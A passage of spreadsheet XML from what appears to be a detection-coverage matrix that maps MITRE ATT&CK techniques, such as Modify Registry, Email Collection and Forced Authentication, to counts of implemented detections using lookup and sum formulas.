      <c r="W26" s="13"/>
      <c r="X26" s="394"/>
      <c r="Y26" s="392"/>
      <c r="Z26" s="392"/>
      <c r="AA26" s="322"/>
      <c r="AB26" s="392"/>
      <c r="AC26" s="16"/>
      <c r="AD26" s="394"/>
      <c r="AE26" s="392"/>
      <c r="AF26" s="392"/>
      <c r="AG26" s="322"/>
      <c r="AH26" s="392"/>
      <c r="AI26" s="16"/>
      <c r="AJ26" s="394"/>
      <c r="AK26" s="392"/>
      <c r="AL26" s="392"/>
      <c r="AM26" s="322"/>
      <c r="AN26" s="392"/>
      <c r="AO26" s="16"/>
      <c r="AP26" s="394"/>
      <c r="AQ26" s="292"/>
      <c r="AR26" s="322"/>
      <c r="AS26" s="322"/>
      <c r="AT26" s="12"/>
      <c r="AU26" s="13"/>
      <c r="AV26" s="394"/>
      <c r="AW26" s="392"/>
      <c r="AX26" s="392"/>
      <c r="AY26" s="322"/>
      <c r="BA26" s="16"/>
      <c r="BB26" s="394"/>
      <c r="BC26" s="292"/>
      <c r="BD26" s="322"/>
      <c r="BE26" s="322"/>
      <c r="BF26" s="12"/>
      <c r="BG26" s="13"/>
      <c r="BH26" s="394"/>
      <c r="BI26" s="292">
        <v>1</v>
      </c>
      <c r="BJ26" s="322">
        <v>1</v>
      </c>
      <c r="BK26" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="BL26" s="12">
        <v>1</v>
      </c>
      <c r="BM26" s="13">
        <v>1</v>
      </c>
      <c r="BN26" s="394">
        <v>1</v>
      </c>
      <c r="BO26" s="292">
        <v>6</v>
      </c>
      <c r="BP26" s="322">
        <v>2</v>
      </c>
      <c r="BQ26" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (6)</v>
      </c>
      <c r="BR26" s="12">
        <v>1</v>
      </c>
      <c r="BS26" s="12">
        <v>1</v>
      </c>
      <c r="BT26" s="13">
        <v>1</v>
      </c>
      <c r="BU26" s="394">
        <v>2</v>
      </c>
      <c r="BV26" s="292">
        <v>0</v>
      </c>
      <c r="BW26" s="322">
        <v>0</v>
      </c>
      <c r="BX26" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY26" s="12">
        <v>0</v>
      </c>
      <c r="BZ26" s="13">
        <v>0</v>
      </c>
      <c r="CA26" s="394">
        <v>0</v>
      </c>
      <c r="CB26" s="292">
        <v>2</v>
      </c>
      <c r="CC26" s="322">
        <v>2</v>
      </c>
      <c r="CD26" s="322" t="str">
        <f t="shared" ref="CD26:CD67" si="5">CC26 &amp; " (" &amp; CB26 &amp; ")"</f>
        <v>2 (2)</v>
      </c>
      <c r="CE26" s="12">
        <v>0</v>
      </c>
      <c r="CF26" s="12">
        <v>1</v>
      </c>
      <c r="CG26" s="13">
        <v>1</v>
      </c>
      <c r="CH26" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="27" spans="1:86" ht="15" customHeight="1">
      <c r="A27" s="4">
        <f t="shared" si="3"/>
        <v>25</v>
      </c>
      <c r="B27" s="4" t="str">
        <f>IFERROR(VLOOKUP(A27,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1112</v>
      </c>
      <c r="C27" s="493" t="str">
        <f>IFERROR(VLOOKUP(B27,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Modify Registry</v>
      </c>
      <c r="D27" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B27)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E27" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>15</v>
      </c>
      <c r="F27" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (15)</v>
      </c>
      <c r="G27" s="292"/>
      <c r="H27" s="322"/>
      <c r="I27" s="322"/>
      <c r="J27" s="12"/>
      <c r="K27" s="13"/>
      <c r="L27" s="394"/>
      <c r="M27" s="322"/>
      <c r="N27" s="322"/>
      <c r="O27" s="322"/>
      <c r="P27" s="12"/>
      <c r="Q27" s="13"/>
      <c r="R27" s="394"/>
      <c r="S27" s="292"/>
      <c r="T27" s="322"/>
      <c r="U27" s="322"/>
      <c r="V27" s="12"/>
      <c r="W27" s="13"/>
      <c r="X27" s="394"/>
      <c r="Y27" s="392"/>
      <c r="Z27" s="392"/>
      <c r="AA27" s="322"/>
      <c r="AB27" s="392"/>
      <c r="AC27" s="16"/>
      <c r="AD27" s="394"/>
      <c r="AE27" s="392"/>
      <c r="AF27" s="392"/>
      <c r="AG27" s="322"/>
      <c r="AH27" s="392"/>
      <c r="AI27" s="16"/>
      <c r="AJ27" s="394"/>
      <c r="AK27" s="392"/>
      <c r="AL27" s="392"/>
      <c r="AM27" s="322"/>
      <c r="AN27" s="392"/>
      <c r="AO27" s="16"/>
      <c r="AP27" s="394"/>
      <c r="AQ27" s="292"/>
      <c r="AR27" s="322"/>
      <c r="AS27" s="322"/>
      <c r="AT27" s="12"/>
      <c r="AU27" s="13"/>
      <c r="AV27" s="394"/>
      <c r="AW27" s="392"/>
      <c r="AX27" s="392"/>
      <c r="AY27" s="322"/>
      <c r="BA27" s="16"/>
      <c r="BB27" s="394"/>
      <c r="BC27" s="292"/>
      <c r="BD27" s="322"/>
      <c r="BE27" s="322"/>
      <c r="BF27" s="12"/>
      <c r="BG27" s="13"/>
      <c r="BH27" s="394"/>
      <c r="BI27" s="292">
        <v>0</v>
      </c>
      <c r="BJ27" s="322">
        <v>0</v>
      </c>
      <c r="BK27" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL27" s="12">
        <v>0</v>
      </c>
      <c r="BM27" s="13">
        <v>0</v>
      </c>
      <c r="BN27" s="394">
        <v>0</v>
      </c>
      <c r="BO27" s="292">
        <v>9</v>
      </c>
      <c r="BP27" s="322">
        <v>9</v>
      </c>
      <c r="BQ27" s="322" t="str">
        <f t="shared" si="1"/>
        <v>9 (9)</v>
      </c>
      <c r="BR27" s="12">
        <v>0</v>
      </c>
      <c r="BS27" s="12">
        <v>5</v>
      </c>
      <c r="BT27" s="13">
        <v>1</v>
      </c>
      <c r="BU27" s="394">
        <v>8</v>
      </c>
      <c r="BV27" s="292">
        <v>0</v>
      </c>
      <c r="BW27" s="322">
        <v>0</v>
      </c>
      <c r="BX27" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY27" s="12">
        <v>0</v>
      </c>
      <c r="BZ27" s="13">
        <v>0</v>
      </c>
      <c r="CA27" s="394">
        <v>0</v>
      </c>
      <c r="CB27" s="292">
        <v>0</v>
      </c>
      <c r="CC27" s="322">
        <v>0</v>
      </c>
      <c r="CD27" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE27" s="12">
        <v>0</v>
      </c>
      <c r="CF27" s="12">
        <v>0</v>
      </c>
      <c r="CG27" s="13">
        <v>0</v>
      </c>
      <c r="CH27" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:86" ht="15" customHeight="1">
      <c r="A28" s="4">
        <f t="shared" si="3"/>
        <v>26</v>
      </c>
      <c r="B28" s="4" t="str">
        <f>IFERROR(VLOOKUP(A28,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1114</v>
      </c>
      <c r="C28" s="493" t="str">
        <f>IFERROR(VLOOKUP(B28,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Email Collection</v>
      </c>
      <c r="D28" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B28)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E28" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F28" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (10)</v>
      </c>
      <c r="G28" s="292"/>
      <c r="H28" s="322"/>
      <c r="I28" s="322"/>
      <c r="J28" s="12"/>
      <c r="K28" s="13"/>
      <c r="L28" s="394"/>
      <c r="M28" s="322"/>
      <c r="N28" s="322"/>
      <c r="O28" s="322"/>
      <c r="P28" s="12"/>
      <c r="Q28" s="13"/>
      <c r="R28" s="394"/>
      <c r="S28" s="292"/>
      <c r="T28" s="322"/>
      <c r="U28" s="322"/>
      <c r="V28" s="12"/>
      <c r="W28" s="13"/>
      <c r="X28" s="394"/>
      <c r="Y28" s="392"/>
      <c r="Z28" s="392"/>
      <c r="AA28" s="322"/>
      <c r="AB28" s="392"/>
      <c r="AC28" s="16"/>
      <c r="AD28" s="394"/>
      <c r="AE28" s="392"/>
      <c r="AF28" s="392"/>
      <c r="AG28" s="322"/>
      <c r="AH28" s="392"/>
      <c r="AI28" s="16"/>
      <c r="AJ28" s="394"/>
      <c r="AK28" s="392"/>
      <c r="AL28" s="392"/>
      <c r="AM28" s="322"/>
      <c r="AN28" s="392"/>
      <c r="AO28" s="16"/>
      <c r="AP28" s="394"/>
      <c r="AQ28" s="292"/>
      <c r="AR28" s="322"/>
      <c r="AS28" s="322"/>
      <c r="AT28" s="12"/>
      <c r="AU28" s="13"/>
      <c r="AV28" s="394"/>
      <c r="AW28" s="392"/>
      <c r="AX28" s="392"/>
      <c r="AY28" s="322"/>
      <c r="BA28" s="16"/>
      <c r="BB28" s="394"/>
      <c r="BC28" s="292"/>
      <c r="BD28" s="322"/>
      <c r="BE28" s="322"/>
      <c r="BF28" s="12"/>
      <c r="BG28" s="13"/>
      <c r="BH28" s="394"/>
      <c r="BI28" s="292">
        <v>0</v>
      </c>
      <c r="BJ28" s="322">
        <v>0</v>
      </c>
      <c r="BK28" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL28" s="12">
        <v>0</v>
      </c>
      <c r="BM28" s="13">
        <v>0</v>
      </c>
      <c r="BN28" s="394">
        <v>0</v>
      </c>
      <c r="BO28" s="292">
        <v>3</v>
      </c>
      <c r="BP28" s="322">
        <v>3</v>
      </c>
      <c r="BQ28" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="BR28" s="12">
        <v>0</v>
      </c>
      <c r="BS28" s="12">
        <v>3</v>
      </c>
      <c r="BT28" s="13">
        <v>1</v>
      </c>
      <c r="BU28" s="394">
        <v>2</v>
      </c>
      <c r="BV28" s="292">
        <v>0</v>
      </c>
      <c r="BW28" s="322">
        <v>0</v>
      </c>
      <c r="BX28" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY28" s="12">
        <v>0</v>
      </c>
      <c r="BZ28" s="13">
        <v>0</v>
      </c>
      <c r="CA28" s="394">
        <v>0</v>
      </c>
      <c r="CB28" s="292">
        <v>0</v>
      </c>
      <c r="CC28" s="322">
        <v>0</v>
      </c>
      <c r="CD28" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE28" s="12">
        <v>0</v>
      </c>
      <c r="CF28" s="12">
        <v>0</v>
      </c>
      <c r="CG28" s="13">
        <v>0</v>
      </c>
      <c r="CH28" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:86" ht="15" customHeight="1">
      <c r="A29" s="4">
        <f t="shared" si="3"/>
        <v>27</v>
      </c>
      <c r="B29" s="4" t="str">
        <f>IFERROR(VLOOKUP(A29,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1132</v>
      </c>
      <c r="C29" s="493" t="str">
        <f>IFERROR(VLOOKUP(B29,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Encoding</v>
      </c>
      <c r="D29" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B29)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E29" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F29" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (10)</v>
      </c>
      <c r="G29" s="292"/>
      <c r="H29" s="322"/>
      <c r="I29" s="322"/>
      <c r="J29" s="12"/>
      <c r="K29" s="13"/>
      <c r="L29" s="394"/>
      <c r="M29" s="322"/>
      <c r="N29" s="322"/>
      <c r="O29" s="322"/>
      <c r="P29" s="12"/>
      <c r="Q29" s="13"/>
      <c r="R29" s="394"/>
      <c r="S29" s="292"/>
      <c r="T29" s="322"/>
      <c r="U29" s="322"/>
      <c r="V29" s="12"/>
      <c r="W29" s="13"/>
      <c r="X29" s="394"/>
      <c r="Y29" s="392"/>
      <c r="Z29" s="392"/>
      <c r="AA29" s="322"/>
      <c r="AB29" s="392"/>
      <c r="AC29" s="16"/>
      <c r="AD29" s="394"/>
      <c r="AE29" s="392"/>
      <c r="AF29" s="392"/>
      <c r="AG29" s="322"/>
      <c r="AH29" s="392"/>
      <c r="AI29" s="16"/>
      <c r="AJ29" s="394"/>
      <c r="AK29" s="392"/>
      <c r="AL29" s="392"/>
      <c r="AM29" s="322"/>
      <c r="AN29" s="392"/>
      <c r="AO29" s="16"/>
      <c r="AP29" s="394"/>
      <c r="AQ29" s="292"/>
      <c r="AR29" s="322"/>
      <c r="AS29" s="322"/>
      <c r="AT29" s="12"/>
      <c r="AU29" s="13"/>
      <c r="AV29" s="394"/>
      <c r="AW29" s="392"/>
      <c r="AX29" s="392"/>
      <c r="AY29" s="322"/>
      <c r="BA29" s="16"/>
      <c r="BB29" s="394"/>
      <c r="BC29" s="292"/>
      <c r="BD29" s="322"/>
      <c r="BE29" s="322"/>
      <c r="BF29" s="12"/>
      <c r="BG29" s="13"/>
      <c r="BH29" s="394"/>
      <c r="BI29" s="292">
        <v>2</v>
      </c>
      <c r="BJ29" s="322">
        <v>2</v>
      </c>
      <c r="BK29" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (2)</v>
      </c>
      <c r="BL29" s="12">
        <v>2</v>
      </c>
      <c r="BM29" s="13">
        <v>1</v>
      </c>
      <c r="BN29" s="394">
        <v>1</v>
      </c>
      <c r="BO29" s="292">
        <v>5</v>
      </c>
      <c r="BP29" s="322">
        <v>5</v>
      </c>
      <c r="BQ29" s="322" t="str">
        <f t="shared" si="1"/>
        <v>5 (5)</v>
      </c>
      <c r="BR29" s="12">
        <v>2</v>
      </c>
      <c r="BS29" s="12">
        <v>2</v>
      </c>
      <c r="BT29" s="13">
        <v>1</v>
      </c>
      <c r="BU29" s="394">
        <v>4</v>
      </c>
      <c r="BV29" s="292">
        <v>0</v>
      </c>
      <c r="BW29" s="322">
        <v>0</v>
      </c>
      <c r="BX29" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY29" s="12">
        <v>0</v>
      </c>
      <c r="BZ29" s="13">
        <v>0</v>
      </c>
      <c r="CA29" s="394">
        <v>0</v>
      </c>
      <c r="CB29" s="292">
        <v>0</v>
      </c>
      <c r="CC29" s="322">
        <v>0</v>
      </c>
      <c r="CD29" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE29" s="12">
        <v>0</v>
      </c>
      <c r="CF29" s="12">
        <v>0</v>
      </c>
      <c r="CG29" s="13">
        <v>0</v>
      </c>
      <c r="CH29" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:86" ht="15" customHeight="1">
      <c r="A30" s="4">
        <f t="shared" si="3"/>
        <v>28</v>
      </c>
      <c r="B30" s="4" t="str">
        <f>IFERROR(VLOOKUP(A30,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1133</v>
      </c>
      <c r="C30" s="493" t="str">
        <f>IFERROR(VLOOKUP(B30,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>External Remote Services</v>
      </c>
      <c r="D30" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B30)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E30" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B30,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>32</v>
      </c>
      <c r="F30" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (32)</v>
      </c>
      <c r="G30" s="292"/>
      <c r="H30" s="322"/>
      <c r="I30" s="322"/>
      <c r="J30" s="12"/>
      <c r="K30" s="13"/>
      <c r="L30" s="394"/>
      <c r="M30" s="322"/>
      <c r="N30" s="322"/>
      <c r="O30" s="322"/>
      <c r="P30" s="12"/>
      <c r="Q30" s="13"/>
      <c r="R30" s="394"/>
      <c r="S30" s="292"/>
      <c r="T30" s="322"/>
      <c r="U30" s="322"/>
      <c r="V30" s="12"/>
      <c r="W30" s="13"/>
      <c r="X30" s="394"/>
      <c r="Y30" s="392"/>
      <c r="Z30" s="392"/>
      <c r="AA30" s="322"/>
      <c r="AB30" s="392"/>
      <c r="AC30" s="16"/>
      <c r="AD30" s="394"/>
      <c r="AE30" s="392"/>
      <c r="AF30" s="392"/>
      <c r="AG30" s="322"/>
      <c r="AH30" s="392"/>
      <c r="AI30" s="16"/>
      <c r="AJ30" s="394"/>
      <c r="AK30" s="392"/>
      <c r="AL30" s="392"/>
      <c r="AM30" s="322"/>
      <c r="AN30" s="392"/>
      <c r="AO30" s="16"/>
      <c r="AP30" s="394"/>
      <c r="AQ30" s="292"/>
      <c r="AR30" s="322"/>
      <c r="AS30" s="322"/>
      <c r="AT30" s="12"/>
      <c r="AU30" s="13"/>
      <c r="AV30" s="394"/>
      <c r="AW30" s="392"/>
      <c r="AX30" s="392"/>
      <c r="AY30" s="322"/>
      <c r="BA30" s="16"/>
      <c r="BB30" s="394"/>
      <c r="BC30" s="292"/>
      <c r="BD30" s="322"/>
      <c r="BE30" s="322"/>
      <c r="BF30" s="12"/>
      <c r="BG30" s="13"/>
      <c r="BH30" s="394"/>
      <c r="BI30" s="292">
        <v>0</v>
      </c>
      <c r="BJ30" s="322">
        <v>0</v>
      </c>
      <c r="BK30" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL30" s="12">
        <v>0</v>
      </c>
      <c r="BM30" s="13">
        <v>0</v>
      </c>
      <c r="BN30" s="394">
        <v>0</v>
      </c>
      <c r="BO30" s="292">
        <v>32</v>
      </c>
      <c r="BP30" s="322">
        <v>30</v>
      </c>
      <c r="BQ30" s="322" t="str">
        <f t="shared" si="1"/>
        <v>30 (32)</v>
      </c>
      <c r="BR30" s="12">
        <v>0</v>
      </c>
      <c r="BS30" s="12">
        <v>7</v>
      </c>
      <c r="BT30" s="13">
        <v>1</v>
      </c>
      <c r="BU30" s="394">
        <v>30</v>
      </c>
      <c r="BV30" s="292">
        <v>0</v>
      </c>
      <c r="BW30" s="322">
        <v>0</v>
      </c>
      <c r="BX30" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY30" s="12">
        <v>0</v>
      </c>
      <c r="BZ30" s="13">
        <v>0</v>
      </c>
      <c r="CA30" s="394">
        <v>0</v>
      </c>
      <c r="CB30" s="292">
        <v>0</v>
      </c>
      <c r="CC30" s="322">
        <v>0</v>
      </c>
      <c r="CD30" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE30" s="12">
        <v>0</v>
      </c>
      <c r="CF30" s="12">
        <v>0</v>
      </c>
      <c r="CG30" s="13">
        <v>0</v>
      </c>
      <c r="CH30" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:86" ht="15" customHeight="1">
      <c r="A31" s="4">
        <f t="shared" si="3"/>
        <v>29</v>
      </c>
      <c r="B31" s="4" t="str">
        <f>IFERROR(VLOOKUP(A31,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1176</v>
      </c>
      <c r="C31" s="493" t="str">
        <f>IFERROR(VLOOKUP(B31,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Software Extensions</v>
      </c>
      <c r="D31" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B31)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E31" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B31,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>217</v>
      </c>
      <c r="F31" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (217)</v>
      </c>
      <c r="G31" s="292"/>
      <c r="H31" s="322"/>
      <c r="I31" s="322"/>
      <c r="J31" s="12"/>
      <c r="K31" s="13"/>
      <c r="L31" s="394"/>
      <c r="M31" s="322"/>
      <c r="N31" s="322"/>
      <c r="O31" s="322"/>
      <c r="P31" s="12"/>
      <c r="Q31" s="13"/>
      <c r="R31" s="394"/>
      <c r="S31" s="292"/>
      <c r="T31" s="322"/>
      <c r="U31" s="322"/>
      <c r="V31" s="12"/>
      <c r="W31" s="13"/>
      <c r="X31" s="394"/>
      <c r="Y31" s="392"/>
      <c r="Z31" s="392"/>
      <c r="AA31" s="322"/>
      <c r="AB31" s="392"/>
      <c r="AC31" s="16"/>
      <c r="AD31" s="394"/>
      <c r="AE31" s="392"/>
      <c r="AF31" s="392"/>
      <c r="AG31" s="322"/>
      <c r="AH31" s="392"/>
      <c r="AI31" s="16"/>
      <c r="AJ31" s="394"/>
      <c r="AK31" s="392"/>
      <c r="AL31" s="392"/>
      <c r="AM31" s="322"/>
      <c r="AN31" s="392"/>
      <c r="AO31" s="16"/>
      <c r="AP31" s="394"/>
      <c r="AQ31" s="292"/>
      <c r="AR31" s="322"/>
      <c r="AS31" s="322"/>
      <c r="AT31" s="12"/>
      <c r="AU31" s="13"/>
      <c r="AV31" s="394"/>
      <c r="AW31" s="392"/>
      <c r="AX31" s="392"/>
      <c r="AY31" s="322"/>
      <c r="BA31" s="16"/>
      <c r="BB31" s="394"/>
      <c r="BC31" s="292"/>
      <c r="BD31" s="322"/>
      <c r="BE31" s="322"/>
      <c r="BF31" s="12"/>
      <c r="BG31" s="13"/>
      <c r="BH31" s="394"/>
      <c r="BI31" s="292">
        <v>0</v>
      </c>
      <c r="BJ31" s="322">
        <v>0</v>
      </c>
      <c r="BK31" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL31" s="12">
        <v>0</v>
      </c>
      <c r="BM31" s="13">
        <v>0</v>
      </c>
      <c r="BN31" s="394">
        <v>0</v>
      </c>
      <c r="BO31" s="292">
        <v>217</v>
      </c>
      <c r="BP31" s="322">
        <v>217</v>
      </c>
      <c r="BQ31" s="322" t="str">
        <f t="shared" si="1"/>
        <v>217 (217)</v>
      </c>
      <c r="BR31" s="12">
        <v>0</v>
      </c>
      <c r="BS31" s="12">
        <v>3</v>
      </c>
      <c r="BT31" s="13">
        <v>1</v>
      </c>
      <c r="BU31" s="394">
        <v>217</v>
      </c>
      <c r="BV31" s="292">
        <v>0</v>
      </c>
      <c r="BW31" s="322">
        <v>0</v>
      </c>
      <c r="BX31" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY31" s="12">
        <v>0</v>
      </c>
      <c r="BZ31" s="13">
        <v>0</v>
      </c>
      <c r="CA31" s="394">
        <v>0</v>
      </c>
      <c r="CB31" s="292">
        <v>0</v>
      </c>
      <c r="CC31" s="322">
        <v>0</v>
      </c>
      <c r="CD31" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE31" s="12">
        <v>0</v>
      </c>
      <c r="CF31" s="12">
        <v>0</v>
      </c>
      <c r="CG31" s="13">
        <v>0</v>
      </c>
      <c r="CH31" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:86" ht="15" customHeight="1">
      <c r="A32" s="4">
        <f t="shared" si="3"/>
        <v>30</v>
      </c>
      <c r="B32" s="4" t="str">
        <f>IFERROR(VLOOKUP(A32,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1187</v>
      </c>
      <c r="C32" s="493" t="str">
        <f>IFERROR(VLOOKUP(B32,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Forced Authentication</v>
      </c>
      <c r="D32" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B32)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E32" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B32,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>11</v>
      </c>
      <c r="F32" s="579" t="str">
        <f t="shared" si="4"/>
        <v>2 (11)</v>
      </c>
      <c r="G32" s="292"/>
      <c r="H32" s="322"/>
      <c r="I32" s="322"/>
      <c r="J32" s="12"/>
      <c r="K32" s="13"/>
      <c r="L32" s="394"/>
      <c r="M32" s="322"/>
      <c r="N32" s="322"/>
      <c r="O32" s="322"/>
      <c r="P32" s="12"/>
      <c r="Q32" s="13"/>
      <c r="R32" s="394"/>
      <c r="S32" s="292"/>
      <c r="T32" s="322"/>
      <c r="U32" s="322"/>
      <c r="V32" s="12"/>
      <c r="W32" s="13"/>
      <c r="X32" s="394"/>
      <c r="Y32" s="392"/>
      <c r="Z32" s="392"/>
      <c r="AA32" s="322"/>
      <c r="AB32" s="392"/>
      <c r="AC32" s="16"/>
      <c r="AD32" s="394"/>
      <c r="AE32" s="392"/>
      <c r="AF32" s="392"/>
      <c r="AG32" s="322"/>
      <c r="AH32" s="392"/>
      <c r="AI32" s="16"/>
      <c r="AJ32" s="394"/>
      <c r="AK32" s="392"/>
      <c r="AL32" s="392"/>
      <c r="AM32" s="322"/>
      <c r="AN32" s="392"/>
      <c r="AO32" s="16"/>
      <c r="AP32" s="394"/>
      <c r="AQ32" s="292"/>
      <c r="AR32" s="322"/>
      <c r="AS32" s="322"/>
      <c r="AT32" s="12"/>
      <c r="AU32" s="13"/>
      <c r="AV32" s="394"/>
      <c r="AW32" s="392"/>
      <c r="AX32" s="392"/>
      <c r="AY32" s="322"/>
      <c r="BA32" s="16"/>
      <c r="BB32" s="394"/>
      <c r="BC32" s="292"/>
      <c r="BD32" s="322"/>
      <c r="BE32" s="322"/>
      <c r="BF32" s="12"/>
      <c r="BG32" s="13"/>
      <c r="BH32" s="394"/>
      <c r="BI32" s="292">
        <v>0</v>
      </c>
      <c r="BJ32" s="322">
        <v>0</v>
      </c>
      <c r="BK32" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL32" s="12">
        <v>0</v>
      </c>
      <c r="BM32" s="13">
        <v>0</v>
      </c>
      <c r="BN32" s="394">
        <v>0</v>
      </c>
      <c r="BO32" s="292">
        <v>18</v>
      </c>
      <c r="BP32" s="322">
        <v>18</v>
      </c>
      <c r="BQ32" s="322" t="str">
        <f t="shared" si="1"/>
        <v>18 (18)</v>
      </c>
      <c r="BR32" s="12">
        <v>0</v>
      </c>
      <c r="BS32" s="12">
        <v>3</v>
      </c>
      <c r="BT32" s="13">
        <v>1</v>
      </c>
      <c r="BU32" s="394">
        <v>10</v>
      </c>
      <c r="BV32" s="292">
        <v>0</v>
      </c>
      <c r="BW32" s="322">
        <v>0</v>
      </c>
      <c r="BX32" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY32" s="12">
        <v>0</v>
      </c>
      <c r="BZ32" s="13">
        <v>0</v>
      </c>
      <c r="CA32" s="394">
        <v>0</v>
      </c>
      <c r="CB32" s="292">
        <v>0</v>
      </c>
      <c r="CC32" s="322">
        <v>0</v>
      </c>
      <c r="CD32" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE32" s="12">
        <v>0</v>
      </c>
      <c r="CF32" s="12">
        <v>0</v>
      </c>
      <c r="CG32" s="13">
        <v>0</v>
      </c>
      <c r="CH32" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:86" ht="15" customHeight="1">
      <c r="A33" s="4">
        <f t="shared" si="3"/>
        <v>31</v>
      </c>
      <c r="B33" s="4" t="str">
        <f>IFERROR(VLOOKUP(A33,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1189</v>
      </c>
      <c r="C33" s="493" t="str">
        <f>IFERROR(VLOOKUP(B33,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Drive-by Compromise</v>
      </c>
      <c r="D33" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B33)*
